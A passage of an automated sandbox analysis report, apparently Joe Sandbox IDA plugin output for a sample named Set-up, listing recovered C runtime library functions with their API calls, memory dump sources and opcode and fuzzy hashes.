Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
String ID:
API String ID: 4058414921-0
Opcode ID: 5b5309c027b6e87c3f1c50d7832de5d62f0eeda551c075872f40751f01c52b5d
Instruction ID: a437a984aea7e692b3fd347095a5ae7c644db47e482f47a3b0130c0b1b550ac6
Opcode Fuzzy Hash: 5b5309c027b6e87c3f1c50d7832de5d62f0eeda551c075872f40751f01c52b5d
Instruction Fuzzy Hash: 83517C30508781CFD715DF29D580B16B7E0FF8A724F108AADE5AA8B295D734E845CB92

Function 6BB619A5 Relevance: 6.1, APIs: 4, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

_isleadbyte_l.MSVCR100(?,?,?,?,?,?), ref: 6BB692C2
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 6BB692E8
_errno.MSVCR100(?,?,?,?), ref: 6BB8A17D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno_isleadbyte_l
String ID:
API String ID: 911568377-0
Opcode ID: 37e8d89fbd002ea842d931cdfcb9818a7f1aaeecff82687da24f742d34f1c04c
Instruction ID: 4591b9be406879bf1cbdff3553349e786e4e80537449cff988a7bea643f1db79
Opcode Fuzzy Hash: 37e8d89fbd002ea842d931cdfcb9818a7f1aaeecff82687da24f742d34f1c04c
Instruction Fuzzy Hash: F331BF32A042DAEFDB01DFA8C880AAE3BB1FF02350B1445A9E4658B1D0E735DD41CF51

Function 6BB6EF9C Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

__isctype_l.LIBCMT(7FFFFFFF,00000001,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB8A2E4
_isleadbyte_l.MSVCR100(00000008,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6BB8A320
__crtLCMapStringA.MSVCR100(00000000,?,00000100,00000000,00000001,7FFFFFFF,00000003,?,00000001,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6BB8A36D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: String__crt__isctype_l_isleadbyte_l
String ID:
API String ID: 150061899-0
Opcode ID: f7d9de18de3688a9384fe264b6b44a006c77173d38ef939bd1b8464381d42120
Instruction ID: beefc54c3db96c9b79e416258a55e72efad7bb29737a290296dbb7ef0c03338e
Opcode Fuzzy Hash: f7d9de18de3688a9384fe264b6b44a006c77173d38ef939bd1b8464381d42120
Instruction Fuzzy Hash: 2631B631908289AFEB11CBA8C886FEE7FB4EB01358F0440A9E5549F1C1E779DA45CF61

Function 6BB5F6A8 Relevance: 6.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

_CallDestructExceptionObject.LIBCMT ref: 6BB5F721
_global_unwind2.MSVCR100(?), ref: 6BB5F72D
_local_unwind2.MSVCR100(?,?), ref: 6BB5F73A
_local_unwind2.MSVCR100(?,000000FF), ref: 6BB5F790

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _local_unwind2$CallDestructExceptionObject_global_unwind2
String ID:
API String ID: 277650583-0
Opcode ID: a9c57badb05076d457bd60b1244720519eeb5ec2f6905369dde1fe81f98cf5ae
Instruction ID: 367328195bb02d07f4f286f3f033d05ed29eb00587aca427d51c6a26aeed2d9d
Opcode Fuzzy Hash: a9c57badb05076d457bd60b1244720519eeb5ec2f6905369dde1fe81f98cf5ae
Instruction Fuzzy Hash: 9131C773A00248DBCB00DF68DC819AEF7A9FB04364F4581A5ED199B245DB39FA25C7E1

Function 6BB96508 Relevance: 6.1, APIs: 4, Instructions: 91sleepCOMMON

Download Yara Rule

APIs

?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,6BB96670,0000002C,6BB969F9), ref: 6BB9652C

Part of subcall function 6BB96E51: _SpinWait.LIBCMT(00000FA0,00000FA0,?,6BB9AD21,00000000), ref: 6BB96E6B

?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB96572
?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB965C2
Sleep.KERNEL32(00000001), ref: 6BB965E2

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Concurrency@@Spin$AcquireLock@details@ReaderWrite@_Writer$A@@details@Once@?$_SleepWaitWait@$0
String ID:
API String ID: 947146699-0
Opcode ID: 8ca508ae4232d111353334d928d2d744e637e3816bb1a0aab12f4771589f3477
Instruction ID: 8441133dff5408c16b82cbe846a7cd28a790254690d0ebd15757ef934ab7fbc9
Opcode Fuzzy Hash: 8ca508ae4232d111353334d928d2d744e637e3816bb1a0aab12f4771589f3477
Instruction Fuzzy Hash: 9C418871A047888FDB10EFA8E9457CEBBF0AF06318F04016DD452A7285D7B9E904CBE4

Function 6BB6489C Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB8986D
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89878
_errno.MSVCR100 ref: 6BB89881
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8988C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: c3d6eaa9eee9f134ec7c17922ac70990d059539d88e92a874fd5c09d6225e68c
Instruction ID: 37d4c703fb89b843ca5da3d5164dc8a7b8051d8dd1d8c7a8ab74cc2aecf08b97
Opcode Fuzzy Hash: c3d6eaa9eee9f134ec7c17922ac70990d059539d88e92a874fd5c09d6225e68c
Instruction Fuzzy Hash: 3121E076A54AE68BDF048F29C8506BA33B0FF42BD4B1040D9E8919B380F73D8D41C7A0

Function 6BB696F6 Relevance: 6.1, APIs: 4, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

_towlower_l.MSVCR100(?,?,?), ref: 6BB6973E

Part of subcall function 6BB62939: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6BB6297D

_towlower_l.MSVCR100(?,?,?,?,?), ref: 6BB6974E
_errno.MSVCR100 ref: 6BB8C6CA
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8C6D5

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _towlower_l$_errno_invalid_parameter_noinfoiswctype
String ID:
API String ID: 2204055994-0
Opcode ID: ba0f12c23ae9cc6553eda531eafe76f1f3573c430cfd055574d5848509f427d6
Instruction ID: fa4294559ec3350fc989c73e18fa9a33138aa779705fbb29f9390d890aa73b0e
Opcode Fuzzy Hash: ba0f12c23ae9cc6553eda531eafe76f1f3573c430cfd055574d5848509f427d6
Instruction Fuzzy Hash: 5C21D8B65002D997DB248FA5CD816BE37A8FF44A95B9005B6E8A0DB181F73CCD40D770

Function 6BB75FCE Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

_wcspbrk.LIBCMT(?,6BB76018,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB75FF5
_calloc_crt.MSVCR100(00000004,00000001,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB7603C
free.MSVCR100(00000000,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB76078
_wmatch.LIBCMT ref: 6BB87738

Part of subcall function 6BB75F95: _malloc_crt.MSVCR100(00000008,?,6BBACE77,?,00000000,-00000002,6BC04BD8), ref: 6BB75F9C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _calloc_crt_malloc_crt_wcspbrk_wmatchfree
String ID:
API String ID: 588445202-0
Opcode ID: 69f42b9c9fff4c34f5db9b7c5d29de255e0991300610e1793e1741da524740c2
Instruction ID: e1aa35a0646271aa4b88e96bf313179275d4ae0b6b90805c088af0bb034c40f8
Opcode Fuzzy Hash: 69f42b9c9fff4c34f5db9b7c5d29de255e0991300610e1793e1741da524740c2
Instruction Fuzzy Hash: EE21C376904A90CFD732EF2DD980909B7F4EF85B20322016ED576DB250F63BD9418B80

Function 6BB6CD87 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

_lock_file.MSVCR100(?,6BB6CE28,00000014), ref: 6BB6CDD4

Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584

_fgetwc_nolock.MSVCR100(?,?,?,6BB6CE28,00000014), ref: 6BB6CDE9
_errno.MSVCR100(6BB6CE28,00000014), ref: 6BB72E04
_invalid_parameter_noinfo.MSVCR100(6BB6CE28,00000014), ref: 6BB886B0

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
String ID:
API String ID: 3916178533-0
Opcode ID: 0df1b7183eeec3ae5262a6c89799cb4aaae7daef2d5710cc2189641de4487b0a
Instruction ID: cfff5480773cb3e4acbaf1d80ac88cfa06552795b9f4d007accfc3863c38e7f8
Opcode Fuzzy Hash: 0df1b7183eeec3ae5262a6c89799cb4aaae7daef2d5710cc2189641de4487b0a
Instruction Fuzzy Hash: 77116D719002CADFDF249FB8C8811AD77B0EF493A4B20887ED56497180E73C9D919B90

Function 6BB6FCB3 Relevance: 6.1, APIs: 4, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcslen.LIBCMT(00000000), ref: 6BB6FCD5
_wcslen.LIBCMT(00000000), ref: 6BB6FCE8
_wcsnicoll.MSVCR100(00000000,00000000,00000000), ref: 6BB6FD05
___mbtow_environ.LIBCMT ref: 6BB9086D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _wcslen$___mbtow_environ_wcsnicoll
String ID:
API String ID: 3727037093-0
Opcode ID: 435875a49ebe8552dd8d8487f57d992435e2a869b9132abef6ae43f6ea93c1d0
Instruction ID: 56933e4e72d68a7cf71055915e55ad537a54cf62848cd9b51365aade185d301f
Opcode Fuzzy Hash: 435875a49ebe8552dd8d8487f57d992435e2a869b9132abef6ae43f6ea93c1d0
Instruction Fuzzy Hash: 4401A132A046E1ABDB216A69D840A0A33F8DF85BD8B15407ADC68D7100F73DDD8187A0

Function 6BB723EC Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?,?,00000001), ref: 6BB72431
_lseek.MSVCR100(00000000,?,00000001), ref: 6BB72438
_errno.MSVCR100 ref: 6BB88D1F
_ftell_nolock.MSVCR100(?), ref: 6BB88D33

Part of subcall function 6BB6A665: _fileno.MSVCR100(?,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A694
Part of subcall function 6BB6A665: _write.MSVCR100(00000000,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A69B

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _fileno$_errno_ftell_nolock_lseek_write
String ID:
API String ID: 2052885585-0
Opcode ID: f6837d8dc791abc975b40b5d4d35631d026802e17a87ae3227d751dc625f0802
Instruction ID: 94e7c5ab726e615f8eace8b58527b25f5f437bf6a35ab8a5ae8a452a23db4c50
Opcode Fuzzy Hash: f6837d8dc791abc975b40b5d4d35631d026802e17a87ae3227d751dc625f0802
Instruction Fuzzy Hash: 9001C4324007A59FDB219E35C801B8E77A4EF03778F248629EA74561D0E73DD6018B51

Function 6BBA0393 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BBA039A

Part of subcall function 6BB9B4E1: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB9B503

??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR100(?,00000000,6BC04628,0000000C,6BBA0342,?,?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?,?), ref: 6BBA03DD
memcpy.MSVCR100(?,?,00000024,6BC04628,0000000C,6BBA0342,?,?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?), ref: 6BBA03F8
??3@YAXPAX@Z.MSVCR100(?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?,?,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBA0422

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Concurrency@@Spin$??3@H_prolog3Once@?$_Policy@SchedulerWait@$00@details@memcpy
String ID:
API String ID: 3595554022-0
Opcode ID: c853394652bf4b0de673db48fb922438cce2fcff5a275c023d78695ebb8e68ab
Instruction ID: e69ab869d67b227ecb36a098f09f75fa811a2be91ab32a93bfdfa6a05855fc81
Opcode Fuzzy Hash: c853394652bf4b0de673db48fb922438cce2fcff5a275c023d78695ebb8e68ab
Instruction Fuzzy Hash: 60115E31A092909BDF04DF64CC81BAD77F4EF09318F5504ADF510EB690EB7ADA449B54

Function 6BB72214 Relevance: 6.1, APIs: 4, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT(00000000), ref: 6BB72232
_strlen.LIBCMT(00000000), ref: 6BB72241
__fassign.LIBCMT(00000000,00000000,00000000), ref: 6BB7225D
___wtomb_environ.LIBCMT ref: 6BB90817

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _strlen$___wtomb_environ__fassign
String ID:
API String ID: 1283471604-0
Opcode ID: 0a4a78f2a37b9a10147578de94aaa48032a7a6242d4daf9ccd7965fa4b24661c
Instruction ID: 4c9c125bd0b0f1b2f827d9a47b491f42585d52cf9c6b65400359264e7fdfdd32
Opcode Fuzzy Hash: 0a4a78f2a37b9a10147578de94aaa48032a7a6242d4daf9ccd7965fa4b24661c
Instruction Fuzzy Hash: F401B173E08DD0A7DB31AA69D940A4937E8EB87B94B1544BAE838A7500D739D9408791

Function 6BB62B2A Relevance: 6.1, APIs: 4, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

_msize.MSVCR100(?), ref: 6BB62B59
realloc.MSVCR100(?,?), ref: 6BB62B65
_memset.LIBCMT(00000000,00000000,?), ref: 6BB62B7E
_errno.MSVCR100 ref: 6BB8F352

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_memset_msizerealloc
String ID:
API String ID: 1728161066-0
Opcode ID: 5429b36844b1c51c28563ff91aa890585944cbb2be13d04acb69f0e001fb0dba
Instruction ID: 7af7af081d46c25b171ed3309b8b7e8e562ea7ebc799ab41afb1c9bdd5bf46d3
Opcode Fuzzy Hash: 5429b36844b1c51c28563ff91aa890585944cbb2be13d04acb69f0e001fb0dba
Instruction Fuzzy Hash: 12F0F4376042966FEB144D75ECC5D9F7B5AEBC42B4B18453EF90886240FA78CC4085A0

Function 6BB67F02 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

_calloc_crt.MSVCR100(00000001,00000164), ref: 6BB67F23
InterlockedDecrement.KERNEL32(?), ref: 6BB75B3B
___free_lc_time.LIBCMT ref: 6BB91681
free.MSVCR100(00000000,00000000), ref: 6BB91687

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: DecrementInterlocked___free_lc_time_calloc_crtfree
String ID:
API String ID: 1841316378-0
Opcode ID: 68d03d9b632b690e71807e630ed356174e354ace1853671912edfe39ba934e4e
Instruction ID: e492c6d49b7ac66c3d48f385846a00230ce0875d36d24baf96d33de4065583ab
Opcode Fuzzy Hash: 68d03d9b632b690e71807e630ed356174e354ace1853671912edfe39ba934e4e
Instruction Fuzzy Hash: 1601A9326093916FD3146B759C81B6E77EDD7827A8F180439E519D7240FBBDDC414361

Function 6BB73DD5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB8AA85
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8AA90
_errno.MSVCR100(?), ref: 6BB8AA99
_invalid_parameter_noinfo.MSVCR100(?), ref: 6BB8AAA4

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: dadaf8a595f0c1cbaa57641133ffbf19a09de834fc34bf6b7a23a5bd6981d78f
Instruction ID: 8702b0e39dbe4a703d1afc9dc7ff3106347c80c6484763d3bedcf00884c3fd60
Opcode Fuzzy Hash: dadaf8a595f0c1cbaa57641133ffbf19a09de834fc34bf6b7a23a5bd6981d78f
Instruction Fuzzy Hash: BE11C0309142E99BDB25AF34C4847AD7BE0EF41718F1085A9C4226A1C0EB7D9A81CFD0

Function 6BBA0A85 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6BBA0376: TlsGetValue.KERNEL32(6BB96C15,6BB95BAE,?,?,?,6BB95B14,?), ref: 6BBA037C

Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AAB

Part of subcall function 6BB9816F: std::exception::exception.LIBCMT(?,00000000,?,?,6BBA0AB0,?,00000000), ref: 6BB98183

_CxxThrowException.MSVCR100(?,6BBFFFD4,?,00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AB9

Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813

TlsSetValue.KERNEL32(00000000), ref: 6BBA0AD4
TlsSetValue.KERNEL32(00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AFE

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Value$Exception$Concurrency::unsupported_os::unsupported_osRaiseThrowstd::exception::exception
String ID:
API String ID: 1973407479-0
Opcode ID: 77472794b65bbed4ef245e23bd1de778f396599f4650991f96f2cbf21560cf3e
Instruction ID: 217c815e2fd6cfd4078b3ec7e8d21ccb993662a28b7625e7eec883c070b22f82
Opcode Fuzzy Hash: 77472794b65bbed4ef245e23bd1de778f396599f4650991f96f2cbf21560cf3e
Instruction Fuzzy Hash: 5301F7329052946FDB16EF78CC41A5EFBF9EF45354F4100AAE06593150DB39ED01CB94

Function 6BB75B46 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT(00000000,01821910,00000000,00000000,?,6BBDFB0F,00000000,00000000,00000000,0000003D,?,6BB91BA0,00000000,00000000,74DEDFF0), ref: 6BB75B5C
malloc.MSVCR100(00000001,00000000,01821910,00000000,00000000,?,6BBDFB0F,00000000,00000000,00000000,0000003D,?,6BB91BA0,00000000,00000000,74DEDFF0), ref: 6BB75B65

Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263

strcpy_s.MSVCR100(00000000,00000001,00000000,01821910,00000000,00000000,?,6BBDFB0F,00000000,00000000,00000000,0000003D,?,6BB91BA0,00000000,00000000), ref: 6BB75B77
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,74DEDFF0), ref: 6BB89624

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
